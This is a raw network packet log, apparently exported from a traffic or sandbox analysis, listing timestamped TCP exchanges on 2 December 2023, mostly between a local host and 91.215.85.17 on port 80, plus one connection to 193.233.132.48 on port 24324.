                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985018969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985027075 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985032082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985044003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985049009 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985076904 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985104084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985166073 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985167980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985193014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985205889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985229015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985230923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985263109 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985271931 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985342979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985356092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985397100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985848904 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.986381054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.987459898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.987473011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.987509966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.991466999 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.143985033 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196449041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196468115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196583986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196656942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196665049 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196669102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196681023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196738958 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196768999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196780920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196793079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196805954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196811914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196901083 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196907043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196918964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196928978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196939945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.196997881 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197024107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197035074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197043896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197053909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197098970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197108030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197154045 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197163105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197166920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197177887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197189093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197213888 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197238922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197278976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197298050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197304010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197386026 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197544098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197582960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197593927 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197701931 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197731972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197742939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197752953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197765112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197774887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197784901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197794914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197805882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197809935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197815895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197827101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197838068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197849989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197860003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197870016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197880983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197890997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197899103 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197901011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197916985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197927952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.197977066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198007107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198019028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198029995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198051929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198066950 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198096991 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198144913 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198159933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198170900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198180914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198193073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198241949 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198312044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198324919 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198326111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198405027 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198410988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198477983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198487997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198506117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198532104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198543072 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198597908 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198621988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198635101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198647976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198683023 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198760033 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198841095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198904037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198916912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198928118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.198987961 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199043989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199054003 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199054956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199065924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199079037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199151993 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199178934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199191093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199213028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199223995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199280024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199300051 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199357986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199574947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199589014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199613094 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199642897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199655056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199660063 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199680090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199692011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199703932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199739933 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199780941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199790001 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199793100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199804068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199815035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199826002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199840069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199840069 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199852943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199862957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199873924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199883938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199894905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199906111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199914932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199927092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199938059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199949026 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199984074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.199995041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200028896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200041056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200048923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200109005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200138092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200149059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200159073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200170040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200217009 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200238943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200251102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200264931 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200292110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200314045 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200347900 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200371027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200382948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200416088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200429916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200437069 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200488091 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200500011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200512886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200561047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200572014 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200572968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200602055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200613976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200683117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200685978 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200695038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200705051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200716019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200726986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200737953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200783968 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200820923 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200834990 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200902939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200913906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200922966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200944901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200957060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200967073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200973034 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.200978994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201044083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201056957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201057911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201067924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201078892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201122999 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201163054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201164961 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201216936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201227903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201237917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201282024 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201330900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201343060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201354027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201364040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201368093 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201451063 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201459885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201472044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201482058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201493025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201545000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201572895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201584101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201591969 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201595068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201606035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201627016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201637983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201675892 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201677084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201689005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201699972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201721907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201771021 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201792002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201805115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201821089 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201849937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201864958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201914072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201914072 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.201925993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202003956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202029943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202042103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202061892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.202091932 CET804972091.215.85.17192.168.2.6
